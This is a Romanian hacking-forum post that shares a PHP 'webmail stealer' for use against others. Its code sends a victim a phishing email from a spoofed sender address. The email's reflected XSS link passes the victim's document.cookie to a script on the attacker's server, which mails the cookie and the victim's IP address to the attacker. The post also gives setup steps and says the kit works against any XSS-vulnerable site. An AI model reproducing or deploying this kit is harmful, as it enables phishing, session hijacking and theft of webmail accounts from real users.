Jump to content
vladiii

[PHP] Generic WebMail Stealer beta

Recommended Posts

configurare.php :


<html>
<head>
<title>Configurare</title>
</head>
<form method=post action="?">
Introdu adresa de e-mail a victimei:

<input type="text" name="vemail" />

Introdu adresa ta de e-mail:

<input type="text" name="temail" />

Introdu adresa "masca" de e-mail:

<input type="text" name="memail" />

<input type="submit" value="Trimite" />
</form>
<?php
if(isset($_POST['vemail']) && isset($_POST['temail']) && isset($_POST['memail'])) {
$vemail=$_POST['vemail'];
$temail=$_POST['temail'];
$memail=$_POST['memail'];

$var1='<?php include "stealer.php";';
//Deschidem fisierul count.txt pentru crearea YahooX.php
$fisier="count.txt";
$read1= file_get_contents('count.txt');

//Incrementam...

$asd = $read1 + 1;
$hand7=fopen($fisier, "w");
fwrite($hand7, $asd);
fclose($hand7);

//Am inchis.

$yah = "yahoo".$read1.".php";
$var2 = 'mail(\''.$temail.'\',"New Cookie","$body"); ?>';

$hand2 = fopen($yah, "x");
fwrite($hand2, $var1);
fwrite($hand2, $var2);
fclose($hand2);

$headers="From: ".$memail."\r\n";
$headers.= "Content-Type: text/plain\r\n";
$headers.= "MIME-Version: 1.0\r\n";
$headers.= "Content-Transfer-Encoding: 8bit\r\n";
$headers.= "X-Mailer: PHP\r\n";

$conti="Click pe urmatorul link: http://sitvuln.com/vuln.php?vulninput=\"><script>location.href=\"siteultau.com/".$yah."?c=\"+escape(document.cookie)</script>";

mail($vemail, "UGENTA!!!", $conti, $headers);
}
//Finished
?>

stealer.php :


<?php
$body="";
$date=date("M-d/G:i");
$body.="Date: $date\r\n";
$ipad=$_SERVER["REMOTE_ADDR"];
$body.="Ip Address: $ipad\r\n";
if($_GET['C']) { $C=$_GET['C']; } else { $C=$_POST['C']; }
$body.="Cookie: $C\r\n";
?>

count.txt :


1

Inlocuiti in configurare.php XSSul care il doriti (acest script poate fi utilizat nu numai pentru yahoo, ci pentru orice site vulnerabil la xss). Nu uitati sa puneti chmod 777 la directorul in care il uploadati si 777 pe count.txt.

Explicarea codului: de fiecare data cand dati submit el creeaza pe server un YahooX.php, care, cand il acceseaza victima ii fura cookieul si va da voua mail cu el.

La adresa voastra de email o bagati pe a voastra, la cea a victimei pe a victimei, iar la "masca", adresa de la care va primi victima e-mail cu siteu vulnerabil la xss.

Sper sa stiti sa-l utilizati. Pentru buguri/sugestii/nelamuriri, postati aici.

Numai bine si urati-mi succes la concursul de mate de sambata :-)

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...